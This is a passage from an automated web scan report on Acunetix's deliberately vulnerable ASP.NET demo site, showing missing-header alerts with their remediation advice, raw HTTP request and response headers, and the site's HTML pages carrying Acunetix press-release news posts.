          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        31. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        32. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is 